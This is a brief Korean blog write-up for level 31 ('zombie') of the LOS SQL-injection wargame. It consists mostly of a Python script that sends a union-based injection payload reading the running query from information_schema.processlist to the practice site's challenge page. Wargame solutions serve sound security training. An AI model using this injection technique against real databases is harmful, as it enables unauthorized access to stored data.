Wargame/LOS(rubiya)
LOS :: 31번 ZOMBIE
G0pher
2018. 8. 27. 16:57
WRITE UP
1 2 3 4 5 6 7 8 9 10 | import requests url = "http://los.rubiya.kr/zombie_78238dee92f8ed0f508b0e9e00fc0e49.php" session = {'PHPSESSID':'MY_SESSION'} data = {'pw':"' union select mid(info,38,67) from information_schema.processlist#"} res = requests.get(url, params=data, cookies = session) if "Clear!" in res.text: print("[♪] ZOMBIE Clear!") | cs |